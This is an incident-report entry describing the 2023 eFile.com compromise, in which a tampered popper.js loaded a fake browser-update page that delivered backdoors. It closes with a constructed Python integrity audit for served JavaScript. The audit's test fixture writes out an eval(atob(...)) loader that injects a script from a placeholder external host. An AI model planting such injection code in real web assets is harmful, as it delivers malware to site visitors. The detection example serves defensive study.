Cyber Incident Victim: eFile.com
Date: Feb 2023
Location: United States of America
Summary
An IRS-authorized tax filing website was compromised to deliver JavaScript malware through a modified Bootstrap component. The injected code ran on nearly every page and displayed a fraudulent SSL error message prompting users to download malware-infected executables. The payloads established persistent backdoors capable of command execution, file retrieval, and lateral movement, though no direct theft of tax data occurred. The attack infrastructure, linked to Chinese actors, used Alibaba-hosted servers and a valid digital certificate issued to a Sichuan-based company. The campaign exploited high user traffic during tax season, and the malicious files were detected by very few antivirus engines. The website operator's failure to detect unauthorized modifications to its own served code allowed prolonged access, potentially impacting many visitors before remediation.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 1 motive | 1 technique |
| Threat Actors | Type | Location |
|---|---|---|
| 0 actors | Available to members | Available to members |
Description
The compromise of the IRS-authorized tax return website eFile.com occurred in early 2023, with malicious activity persisting for several weeks. Threat actors inserted base64-encoded JavaScript malware into a modified version of the legitimate Bootstrap add-on 'popper.js', which was then loaded across nearly all pages of the website. The injected code connected to the domain infoamanewonliag[.]online and triggered a secondary malicious JavaScript file, 'update.js', hosted on an Amazon AWS endpoint. 'update.js' displayed a fraudulent SSL error message containing a deceptive 'update browser' link that initiated malware downloads tailored to the visitor's browser: 'update.exe' for Chromium-based browsers and 'installer.exe' for Firefox. These executables functioned as Windows backdoors written in PHP, establishing persistent connections every ten seconds to a command-and-control (C2) server at IP address 47.245.6.91 (hosted by Alibaba in Tokyo, Japan). The backdoors enabled remote code execution, file downloads, and task scheduling, though there was no evidence of immediate theft of tax return data. Multiple users reported encountering the suspicious error message in a Reddit thread dated March 17, 2023, asking others whether it was legitimate.

The attack infrastructure and forensic evidence suggested involvement by a Chinese threat actor. The malicious executables were signed with a valid digital certificate issued to Sichuan Niurui Science and Technology Co., Ltd., and Chinese-language comments were identified within the code. The threat actors attempted to remove the malicious JavaScript from eFile.com before the website operators fully remediated the compromise, likely to obscure their activities. Security researchers noted the operation's technical inconsistencies, including the unusual use of PHP for backdoor functionality and the clumsy integration of malicious code, indicating a less sophisticated but persistent adversary. The campaign specifically targeted eFile.com's third-party tax filing service, not the IRS's direct e-file systems, exploiting the high-traffic tax season to maximize potential infections. Approximately 1.1 million users visited the website during the compromise window, though the exact number of infected systems remains undetermined. Only two antivirus engines on VirusTotal (CrowdStrike Falcon and Cynet) initially flagged the executables as malicious. The website operator did not issue a public statement regarding the incident, and no containment or remediation actions beyond the eventual removal of the malicious code were documented in available sources. The primary confirmed impact was the installation of backdoors enabling future adversarial actions, including credential theft, lateral movement, and secondary payload deployment.
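The operator's missing control in this incident was integrity monitoring of its own served JavaScript. The following added example (not code from the incident record or from eFile.com) shows two checks a site operator could run on a vendored asset such as popper.js: a SHA-256 comparison against a recorded baseline, and decoding of long base64 runs to surface hidden references to hosts outside the site's allowlist. The library text, the baseline hash, the tampered copy and the host names are all constructed placeholders.

```python
"""Integrity audit for a vendored JavaScript asset (constructed example)."""
import base64
import hashlib
import re
from urllib.parse import urlparse

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")      # long base64-looking runs
URL_IN_TEXT = re.compile(r"https?://[^\s\"')]+")       # URLs inside decoded text


def sha256_hex(text: str) -> str:
    return hashlib.sha256(text.encode()).hexdigest()


def decode_base64_runs(js: str) -> list:
    """Return the decoded text of every long base64 run that decodes to printable text."""
    decoded = []
    for run in B64_RUN.findall(js):
        try:
            raw = base64.b64decode(run, validate=True)
        except ValueError:            # not valid base64 (e.g. a long minified identifier)
            continue
        text = raw.decode("utf-8", errors="ignore")
        if text and all(c.isprintable() or c in "\r\n\t" for c in text):
            decoded.append(text)
    return decoded


def audit_asset(js: str, known_good_sha256: str, allowed_hosts: set) -> list:
    """Return human-readable findings; an empty list means the asset matches its baseline."""
    findings = []
    if sha256_hex(js) != known_good_sha256:
        findings.append("hash mismatch: served asset differs from the recorded baseline")
    for text in decode_base64_runs(js):
        for url in URL_IN_TEXT.findall(text):
            host = urlparse(url).hostname
            if host and host not in allowed_hosts:
                findings.append(f"base64-hidden reference to non-allowlisted host {host}")
    return findings


# Constructed stand-in for the legitimate library and the hash recorded at deploy time.
CLEAN_POPPER = "/* popper.js v2 (constructed stand-in) */\nfunction createPopper(a,b){return {a,b};}\n"
BASELINE = sha256_hex(CLEAN_POPPER)
# Constructed tampered copy: an inert base64 blob (never executed here) whose decoded text
# references a placeholder external host; the analyzer only decodes and inspects it.
HIDDEN = 'var s=document.createElement("script");s.src="https://loader.example.invalid/update.js";document.head.appendChild(s);'
TAMPERED_POPPER = CLEAN_POPPER + 'eval(atob("' + base64.b64encode(HIDDEN.encode()).decode() + '"));\n'

if __name__ == "__main__":
    print(audit_asset(TAMPERED_POPPER, BASELINE, {"www.efile.example"}))
```

Run the audit from a scheduled job against the assets actually served to browsers, not against the copy in source control, since the whole point is to catch divergence between the two.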
